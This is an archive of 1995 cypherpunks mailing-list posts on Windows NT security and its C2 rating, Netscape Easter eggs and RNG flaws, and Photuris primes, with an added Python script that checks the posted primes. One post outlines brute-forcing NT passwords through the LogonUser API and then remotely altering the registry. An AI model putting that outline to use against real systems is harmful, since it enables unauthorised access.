| 	Fortunately, when using NT's SMB services such as drive and file
| sharing, passwords are never sent in the clear.  Just make sure you
| disable that "Guest" account.:)

This is not entirely true. If I log in as 'guest' I cannot modify just 
any key in the registry. I can only modify the ones that I have 
permissions to change.  Also if you know what you are doing you can set 
permissions on any key in the registry so that it can't be modified by 
just anyone.  I can also modify the account permissions so that if a 
logon attempt fails, after a specified number of retries the account is 
locked and will not accept logons until the administrator unlocks the 
account. I'd recommend that you get a copy of Windows NT and the 
Windows NT Resource Kit, install it and play around with the security 
system before you make generalized statements about it.

Mike.
=====================================================

Mike Markley <mmarkley@microsoft.com>

I'm not a Microsoft spokesperson. All opinions expressed here are mine.

=====================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 08:59:33 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
Message-ID: <ac8d6cee030210045390@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I guess you all know how much I hate this "who will be our spokesman?"
thread, but my opinion has been explicitly asked, so I will again comment.
Hopefully, adding a few new points.

At 6:55 AM 9/26/95, Craig Hubley wrote:

>Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ?
>Should we assign someone to be 'our' lawyer ?
>
>I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and
>print enough, and know how to handle and present myself to the press, but if
>this is considered an 'honor' rather than a 'pain in the ass and potential
>legal lightning rod' then I'd like to suggest someone with a longer pedigree
>who has been writing more code lately take it on.  Tim ?

I've turned down several recent chances for interviews, for these reasons:

1. I feel the people doing the work should be interviewed, not just someone
who has some visibility (whatever mine might be). If PGP is the issue, then
they should talk to those working on PGP. If anonymous remailers are the
issue, etc. If, by some chance, they are interested in things I have
directly worked on or written extensively about, then maybe they should
interview me.

(Although for other reasons I refused to have my name attached to the cover
story in "Information Week" about "Internet Theft," BlackNet, etc.)

2. Location, location, location! The media foci are Washington, New York,
and San Francisco, at least for our area of interest. Occasional forays
into Austin, Miami, L.A., etc. This is where the taped interviews are done.

Several "crews" recently in SF wanted "sound bites" and "video bites" from
people like me. I refused, pointing out the wastefulness of my time in
driving 100 miles over mountain roads to SF, fighting parking problems,
waiting around, and ending up with a 7.89 second clip of me saying
something scripted.

(In February I stupidly agreed to travel to LA for a filming of a BBC show
about encryption. Left at dawn, drove to San Jose, flew to LA, took shuttle
to Hollywood, waited around for several hours while crew finished taping
Alvin and Heidi Toffler, set up my laptop, was interviewed by show's
producer, agreed at her repeated prodding to say "I am a Cypherpunk." Got
back to my house at midnight. Guess what they used? The stupid line "I am a
Cypherpunk" and maybe about 20 seconds of other random comments. This is
what we face, as other high tech shows I see have the same disjointed,
out-of-context flavor.)

The point? These "journalists" are tuned to looking for catchy quotes, all
the more so on video than in print. Text journalists can handle complex
themes much better than video reporters can, for many and oft-discussed
reasons.

(Even more disgusting than this was a more recent appearance of a BBC film
crew at a Cypherpunks meeting. They wanted to "stage" the news, to have the
meeting discuss a 2-year-old topic, because that's what their script called
for. I got up and left, as did several other people. I haven't seen this
BBC show, but I gather from a URL that this is the one that has
"performance art" examples of crypto....)

Any "spokesman" needs to be easily accessible when they need a "filler
quote," or a "reaction quote."

However:

3. THERE IS NO SPOKESMAN, THERE IS NO CENTRAL OFFICE, THERE IS NO BOARD OF
DIRECTORS!

With no organization, no office, no coordination, we cannot "feed the media
machine" the way it expects to be fed.

Nor can we "elect" such folks. I didn't help start this list--not that this
gives me more moral sway--in order that J. Random Volunteer will start
speaking for "our beliefs" or will start explaining "our goals" and "our
plans."

Far better that journalists like Steven Levy and John Markoff subscribe to
the list, or to condensations by people like Eric Blossom, and then deal
directly with the experts in some area. Thus, on the latest Netscape flaw,
they would contact Ray Cromwell directly, not deal with the press releases
written by J. Random Volunteer.

Anarchy is part of our charm. More importantly, part of our theme.

Face it, we don't have a press office, we don't have staffing, and--most
importantly--there is no one out there who speaks for me. A spokesman for
the Cypherpunks is an oxymoron.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 26 Sep 95 06:16:11 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: truerand
Message-ID: <9509261314.AA00248@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please send me a copy of the truerand code Matt Blaze
posted yesterday?  I inadvertently deleted the message and Todd's
Cpunk archives seem to have shut down about a month ago.  Many thanks.


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 26 Sep 95 10:41:41 PDT
To: cypherpunks@toad.com
Subject: Re: Easter Eggs
In-Reply-To: <9509261421.AA00130@cfdevx1.lehman.com>
Message-ID: <199509261614.JAA15814@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
> Gillogly) wrote:

> >I'm nervous enough about all the Easter Eggs that have been reported in
> >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
> >different behavior it exhibits when it finds a certain obscurely-named
> >directory at the top level. 

> Rick Busdiecker <rfb@lehman.com> writes:
> Personally, I like the Easter Eggs in Netscape and other software
> products.  I don't know if there's a consensus definition of `Easter
> Egg', but my working definition is something like ``An unpublicized,
> unharmful, preferably amusing, feature for which interested users may
> hunt.''  I think that such things add some fun for curious users and

I enjoy Easter Eggs in general, and I agree that a program with fun stuff
like this in it gives one a warm fuzzy feeling about the relaxed management
style at the company that produces it.  On the other hand, of all kinds of
mass market software, network-aware software needs to have the most trust
from the users, because it alone has the capability of passing information
out of your machine.  My preference is always to have source code
available for security-critical functions so that I can verify that it's
not only doing what I want, but also doing nothing that I don't want.

For a program like Netscape it doesn't make sense to supply source code,
of course, and the Easter Eggs already provide some evidence that it's
doing something that I didn't "buy" (assuming I've bought it, of course).
From there it's a short step to the questions "What else is it doing that
I didn't pay for?  Reading my PGP key generation environment?
Interesting.  What else?"

> I didn't know about the FishCam Easter Egg, but I know that Netscape

Ctrl-alt-f if you're a PC type, or Ctrl-meta-f if you're on a Sun; I'm
calling the diamond to the left of the space bar a "meta".

	Jim Gillogly
	Hevensday, 5 Winterfilth S.R. 1995, 16:14




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 09:24:33 PDT
To: cypherpunks@toad.com
Subject: RE: More on "Entropy"
Message-ID: <199509261622.JAA02167@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFHJDD.Ap@sgi.sgi.com>, David Van Wie <dvw@hamachi.epr.com> writes:

> David Van Wie wrote:

>>> The entropy E is defined by the sum across n states of -P_i log_2(P_i),

> Timothy C. May wrote:

>> Hah! Another physicist converted to the information-theoretic view of 
> entropy!

> Indeed.  I was able to track down the literature, and it is most 
> interesting.  I am still a little bit skeptical of the "superset including 
> thermodynamic entropy" school of thought, but I haven't finished reading all 
> of the materials yet!  Clearly, the IT "version" of entropy is a well 
> defined and useful thing....

We used this formulation of entropy in Statistical Mechanics.  It's
especially useful in Quantum Thermo where you can actually enumerate all
of the states instead of relying on probabilistic arguments.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 26 Sep 95 05:00:30 PDT
To: cypherpunks@toad.com
Subject: Re: Primality verification needed
Message-ID: <1560.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


While you folks are poking at Phil's latest, perhaps you could verify the
others that he generated, already in the Photuris internet-draft:

A 1024-bit strong prime (p), expressed in hex:

97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6
5e55 4313 828d a83b 9ff2 d941 dee9 5689
fada ea09 36ad df19 71fe 635b 20af 4703
6460 3c2d e059 f54b 650a d8fa 0cf7 0121
c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.


A 1024-bit strong prime (p), expressed in hex:

a478 8e21 84b8 d68b fe02 690e 4dbe 485b
17a8 0bc5 f21d 680f 1a84 1313 9734 f7f2
b0db 4e25 3750 018a ad9e 86d4 9b60 04bb
bcf0 51f5 2fcb 66d0 c5fc a63f bfe6 3417
3485 bbbf 7642 e9df 9c74 b85b 6855 e942
13b8 c2d8 9162 abef f434 2435 0e96 be41
edd4 2de9 9a69 6163 8c1d ac59 8bc9 0da0
69b5 0c41 4d8e b865 2adc ff4a 270d 567f

The recommended generator (g) for this prime is 5.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2
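
One way to run the check requested in the message above (an added example, not part of the original post and not Photuris code). It assumes "strong prime" means that p and q = (p-1)/2 are both prime, which the message does not define; the function names are hypothetical, and Miller-Rabin with random bases gives a probabilistic answer, not a primality proof.

```python
import secrets

# The two moduli exactly as printed in the message above, with the generator
# recommended for each.
P1_HEX = """
97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6
5e55 4313 828d a83b 9ff2 d941 dee9 5689
fada ea09 36ad df19 71fe 635b 20af 4703
6460 3c2d e059 f54b 650a d8fa 0cf7 0121
c747 99d7 5871 32be 9b99 9bb9 b787 e8ab
"""
P1_G = 2
P2_HEX = """
a478 8e21 84b8 d68b fe02 690e 4dbe 485b
17a8 0bc5 f21d 680f 1a84 1313 9734 f7f2
b0db 4e25 3750 018a ad9e 86d4 9b60 04bb
bcf0 51f5 2fcb 66d0 c5fc a63f bfe6 3417
3485 bbbf 7642 e9df 9c74 b85b 6855 e942
13b8 c2d8 9162 abef f434 2435 0e96 be41
edd4 2de9 9a69 6163 8c1d ac59 8bc9 0da0
69b5 0c41 4d8e b865 2adc ff4a 270d 567f
"""
P2_G = 5

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47,
                53, 59, 61, 67, 71, 73, 79, 83, 89, 97]


def parse_hex(text):
    """Turn a whitespace-separated hex dump into an integer."""
    return int("".join(text.split()), 16)


def is_probable_prime(n, rounds=40):
    """Miller-Rabin with random bases; a composite passes with probability
    at most 4**-rounds. Random bases matter when someone else chose n."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n == p:
            return True
        if n % p == 0:
            return False
    d, s = n - 1, 0
    while d % 2 == 0:                       # n - 1 = d * 2**s with d odd
        d //= 2
        s += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)    # base in [2, n - 2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                    # a is a witness: n is composite
    return True


def is_safe_prime(p, rounds=40):
    """True when p and (p - 1) / 2 both pass Miller-Rabin."""
    return p > 4 and is_probable_prime(p, rounds) \
        and is_probable_prime((p - 1) // 2, rounds)


def generator_order(g, p):
    """Order of g modulo a safe prime p = 2q + 1: one of 1, 2, q or 2q."""
    q = (p - 1) // 2
    g %= p
    if g == 0:
        raise ValueError("g is not a unit modulo p")
    if g == 1:
        return 1
    if g == p - 1:
        return 2
    return q if pow(g, q, p) == 1 else 2 * q


def check_group(p_hex, g):
    """Summarise one (p, g) pair: size, primality of p and q, order of g."""
    p = parse_hex(p_hex)
    q = (p - 1) // 2
    result = {"bits": p.bit_length(), "p_prime": is_probable_prime(p),
              "q_prime": is_probable_prime(q), "g_order": None}
    if result["p_prime"] and result["q_prime"]:
        order = generator_order(g, p)
        result["g_order"] = ("q" if order == q
                             else "2q" if order == 2 * q else str(order))
    return result


if __name__ == "__main__":
    for label, p_hex, g in (("first", P1_HEX, P1_G), ("second", P2_HEX, P2_G)):
        print(label, check_group(p_hex, g))
```

A g_order of "2q" means g generates the whole multiplicative group; "q" means it generates the prime-order subgroup.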




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sentiono@cycor.ca (Sentiono Leowinata)
Date: Tue, 26 Sep 95 05:23:58 PDT
To: cypherpunks@toad.com
Subject: Netscape for OS/2, when? (Re: Another Netscape Bug)
Message-ID: <199509261223.JAA01800@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:

>> It's not an exploit script, but you can find an auto crash "animation"
>> for Ray's discovered bug on 
>>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
>> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
>Crashes the 16-bit Windows version 1.1N.
>DCF

Same here. For more information (not Netscape related), Web Explorer
1.02 for OS/2 also crashes for the long URL.
I wish Netscape would port it to OS/2 (already asked them, but no comment
from Netscape). I don't try it on Netscape 1.1N as it doesn't run
reliably under Win-OS/2 (10 min -> crash! ;)
------------------------------------------------------
Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada
System Engineer/Programmer Analyst - Cycor Communications Inc. 
sentiono@cycor.ca, 902-629-2488, http://www.cycor.ca/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 06:56:14 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <m0sxU3V-001BjIC@passport.ca>
Message-ID: <199509261355.JAA16305@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Craig Hubley writes:
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
> > -- nor do we want one.
> 
> True enough, but there are sometimes rough consensuses on technical questions,
> and if it were clear enough that these were collective in nature and not to
> be ascribed to any particular person, e.g.:
> 
> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
>  for commercial applications, and that Netscape seems to have taken less
>  than due care to choose an appropriate random seed for its session keys."

Why bother? Why not just say, if asked, that most reasonable technical
experts believe 40 bits are too small, or show them by a technical
demonstration as we already have?

There is this widespread and wholly misplaced affection for
"cypherpunks". We aren't a company or an organization. This is a
mailing list, and occasionally a seminar series in places like
NoCal. It isn't a "group".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 09:53:02 PDT
To: cypherpunks@toad.com
Subject: "Notes" to be Eclipsed by "Netscape"
Message-ID: <ac8d7d09040210041c62@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 9/25/95, Jon Lasser wrote:

>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>a student like myself, and probably most others, if it's still anything
>like it was at the 1.0 release) that most people have had zero opportunity
>to examine the program, let alone really have time to play with it?

I've never even _seen_ a copy of Notes running on any machine, nor do I
know directly of _any_ of my colleagues who has. (Not saying nobody has, of
course, just that I can't find anyone I know well who has.)

I've been following the news on Notes for at least several years, even to
the point of buying some Lotus stock several years ago on the strength of
what I had read about Notes. (Alas, I sold it soon thereafter, before a
run-up in price.)

My point? Notes is nearly invisible in the non-corporate community I now
hang out in.

Who knows what weaknesses or bugs it has in it. Folks on our list probably
don't have much familiarity with it.

My hunch is that, as the "Wall Street Journal" reported yesterday, IBM
overpaid for Lotus, and that the notion of Notes becoming the universal
collaboration/communication option is flawed.

(I've been saying for a while that the Web serves that purpose better, and
that Web browsers will likely edge out Notes. Apparently I was hardly
prescient, as Netscape recently bought Collabra, which is pushing that
point exactly.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 07:12:10 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: Cypherpunks Press release
In-Reply-To: <m0sxTvi-001BjLC@passport.ca>
Message-ID: <199509261411.KAA16336@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Craig Hubley writes:
> I'd volunteer to be 'spokespunk',

You don't speak for me, sir, and never will.

I do my own talking to the press.

Oh, and thank you for helping Detweiler start another flame war. I'm
sure he's very happy (in between Thorazine doses).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 07:19:33 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: Fax Number List
In-Reply-To: <Pine.ULT.3.91.950925192929.1630E-100000@zeus.towson.edu>
Message-ID: <199509261418.KAA16344@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



There are not going to be any "cypherpunks press releases" so there is
no need for this.

"K. M. Ellis" writes:
> 
> I promised last week that I would send this out when the idea of a 
> blanket-fax-campaign for a c-punks press release was being discussed.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 26 Sep 95 07:23:57 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Easter Eggs
In-Reply-To: <199509260259.WAA20138@book.hks.net>
Message-ID: <9509261421.AA00130@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Mon, 25 Sep 1995 22:59:11 -0400
    From: Lucky Green <shamrock@netcom.com>
    Subject: Re: Netscape "random" number seed generator code available

    In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
    Gillogly) wrote:

    >I'm nervous enough about all the Easter Eggs that have been reported in
    >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
    >different behavior it exhibits when it finds a certain obscurely-named
    >directory at the top level. 
    
    Would you please elaborate?

Personally, I like the Easter Eggs in Netscape and other software
products.  I don't know if there's a consensus definition of `Easter
Egg', but my working definition is something like ``An unpublicized,
unharmful, preferably amusing, feature for which interested users may
hunt.''  I think that such things add some fun for curious users and
indicate a bit of `hacker spirit' in the development team -- meaning
`hacker' in the classic sense, not the media-bastardized synonym of
`cracker'.  I also think that in Netscape their existence is an
indication that the management at Netscape is a bit less uptight than
management at some other places.

I didn't know about the FishCam Easter Egg, but I know that Netscape
has a couple of Easter Eggs related to the activity indicator in the
top right of the display.  Typically this is the Big N logo with
animated meteors, etc. flying by when the window is active.  One
Easter Egg temporarily turns this into a compass which spins to
indicate activity.  Another causes the animation to show a dragon
(Mozilla) breathing fire for the remainder of the session.  I won't
spoil your fun by telling how to find them.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGgMNJNR+/jb2ZlNAQEnnQP/TAYOTJtoWX8Pn0cXrKNSlpTCFnyWxC+3
U1E5xUxWMXsbEet3ENu35NtR03ZeyZCVr5viKTTmLptwFf/Qac4isTU78G3YOFTe
A3dX2KZfshxDtrk+n3Rx+NQtUSA+qRn/r0mPYLlFrsMCIXi/sUVhQKY1BH1eRXUK
tghPqDV0exE=
=jgb5
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Tue, 26 Sep 95 07:33:22 PDT
To: rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <199509261433.AA11352@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote:

>
>
>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>what does that say about their so-called COMSEC ability.
>
For fun ways to hack NT, check out http://www.somar.com/security.html.
 Some of these are really laughable.  You can use NT's LogonUser API
call to repeatedly guess passwords until you hit it, since NT offers
no way to limit number of login attempts.
	There also is no way to stop remote users from modifying the
registry.  *Any* user with an account can remotely dump and modify the
system registry.  So in theory you can write a bruteforce program to
keep guessing until it gets a password, then modify the registry to
make the system do "interesting" things.  The worst part of all this
is that the Registry is very poorly documented, MSoft must consider
most of that info "confidential."
	Fortunately, when using NT's SMB services such as drive and file
sharing, passwords are never sent in the clear.  Just make sure you
disable that "Guest" account.:)
							Dan Bailey
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 26 Sep 95 10:37:13 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <9509261733.AA22080@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> >
> >  Here is the press release we put out this morning regarding the fix
> >for RNG seed and stack overflow problems.
> 
> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

That doesn't quite make sense.  Netscape reading randseed.bin can have no
effect on the security of PGP.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 26 Sep 95 07:45:11 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Hack Microsoft?
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <9509261444.AA10518@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




It should be possible to FOIA the evaluation that
led to the C2 status on this. That would be one good
avenue to start looking at it.

At the end of the process there should be a document
that shows how the OS meets each of the C2 requirements
and what aspects of the software were considered as
well.

Things like the state the OS was running under at the
time, (network vs. non-network etc.) are important
considerations in evaluations.

And I would not be too surprised at all if the "C2"
designation was relatively bogus. This sort of thing
can get much like the anti-crypto crowd's arguments.
Highly political with little basis in rationality.

Since I've seen stuff like a ported version of Unix's
"ps" utility, and know NT runs a microkernel, I can think
of a hell of a lot of ways it'd be possible to fail
it right out of the box... Considering that it has the
capacity to do all sorts of network stuff, including FTP
& the like, I wonder how the hell they passed any audit
requirements. Probably a "Well it runs in a single user model,
we don't need to have strong audit requirements".

My point basically being that I would consider the C2 designation
for this to be broken coming out of the box unless I saw
proof that it was otherwise. To operate it in a C2 required
environment without consideration of how & under what
conditions the rating was achieved would be criminally
irresponsible.


Tim Scanlon




________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Tue, 26 Sep 95 08:00:50 PDT
To: cypherpunks@toad.com
Subject: Archives current again
Message-ID: <199509261458.KAA22013@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I've just updated the archives (http://www.hks.net/cpunks/index.html).  To
bring everybody up to date on what's happening:

Hypermail simply isn't up to this size of an archive.  All sorts of bugs
are coming out into the open, so I've been implementing a system designed
for large archives.  Alas, reality has intruded and I haven't had the time
to finish it.

So, I'll be updating the archives by hand from time to time until I can get
the new system on line.  Sorry 'bout that, folks, but you get what you pay
for.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGgVHCoZzwIn1bdtAQE0gwF/dQiO+4lTabDqAt0SgyHmEJSKXgCABGa6
kEOsJIgd/4uIUzrunV+fXBucevMsW4yG
=BngF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 26 Sep 95 08:09:51 PDT
To: cypherpunks@toad.com
Subject: Insecurity in WWW oriented security
Message-ID: <9509261509.AA10554@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I wanted to share an experience with folks on the list
that points to the relevance of what c'punks have been
doing looking at the Web encryption & security issues
like we have.

I was approached by a headhunter yesterday who wanted me
to do the security for a hospital connected to the net.
Straightforward stuff one would think. My initial reaction
was fairly positive, and I responded that I didn't think
I would have much trouble with the task as long as they had
a reasonable setup internally etc. etc. (I'm not a big believer
in hard & crunchy -> soft & chewy when your accounting or
other critical data is part of what can be chewed up...)

Well at that point it got interesting. He told me that said
client was asking as a part of their requirements that they
be able to do "Secure transactions using HTML & Netscape".
My reaction was somewhere along the lines of "What do they
mean by `secure transactions'!! Are they aware that the state of
encryption for WWW is really poor at best right now?" I told him
that I thought this might not be such a hot idea, and that
my interest in this whole thing would hinge totally upon exactly
what sorts of transactions they wanted to do using web servers
and the like. And that depending on the answer to that, I would
or would not be interested in the whole thing.

The reason for my hesitation? I don't want blood on my hands over
a setup that is by definition currently in a state of very poor
security. And right now I have no idea if they want to transfer
MasterCard's or MRI's. But I do know that depending on what it
is they're planning, it might not be a place *I* want to be.

Besides being damned frightening, this points to a trend in
network evolution. Organizations are planning these sorts of
moves and utilizations of the technology with little thought
to the possible consequences of it.

And if the FBI ends up busting some psycho in the future for
tampering with the transactions of MRI data, x-rays, or any
of a million other possibilities, I seriously doubt that
Louis Freeh will be stepping forward to remind us all of
the need for robust security. Instead, it is far more likely
that he would argue that it was another example of the need
for increased monitoring of the internet and controls on
cryptographic solutions.

I found aspects of the whole conversation, juxtaposed with
what has been going on lately with the list, chilling to
say the least.



Tim Scanlon


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Tue, 26 Sep 95 10:33:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <199509260306.XAA20157@book.hks.net>
Message-ID: <9509261732.AA08810@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>data used to keep PGP secure,  Netscape will be banned from my computer
>and every computer I am responsible for. -- For good.

This is the second person who has expressed this sentiment. I don't
understand it. If you believe that the possibility of randseed.bin
getting out is dangerous, then why do you leave it online? Do you
really trust every piece of software you run, every piece of software
that can possibly access your machine over the net, to not look at
that file?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 26 Sep 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft NT C2 Rating?
Message-ID: <199509261856.LAA24022@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:27 AM 9/26/95 -0700, todd@lgt.com (Todd Glassey) replied to Ray:
>>So, if one can find bugs in NT's security, one can
>>toss a little more egg on the NSA's face and the sham that part of
>>their activities to *help* to secure american computers. A simple
>>violation of NT's C2 status would be to demonstrate a flaw in its
>>memory protection implementation.

One of the bigger cracks on VMS was after it got its C2 rating;
a strong system doesn't do you much good if you don't change
the default passwords for the SYSTEM and FIELD service accounts :-)

I'm more surprised by the rating since the Orange Book is basically
for non-networked systems; Red Book rating is _much_ harder, unless
the NSA's taking a different view of trustability of software encryption 
for authentication purposes than they used to.

>As per NT's orange book C2 Rating... C2 is about the lowest level of Secure
>that you can get. In fact I personally am unimpressed, rather it is a box
>on an RFQ that gets checked.  Very few people run C anything sites in reality.

A C2 rating says that most of the obvious bugs have been found, access to
the system and individual files requires authentication, and you can do an 
audit trail to find out who accessed what data when.  Ignoring networks,
that's not too bad.  But, yeah, one of the big reasons for C2 rating is that
government RFPs generally require C2 security, at least for military or
sensitive non-military purchases.  B-level ratings give you multi-level
security, so you can run SECRET and CONFIDENTIAL on the same box;
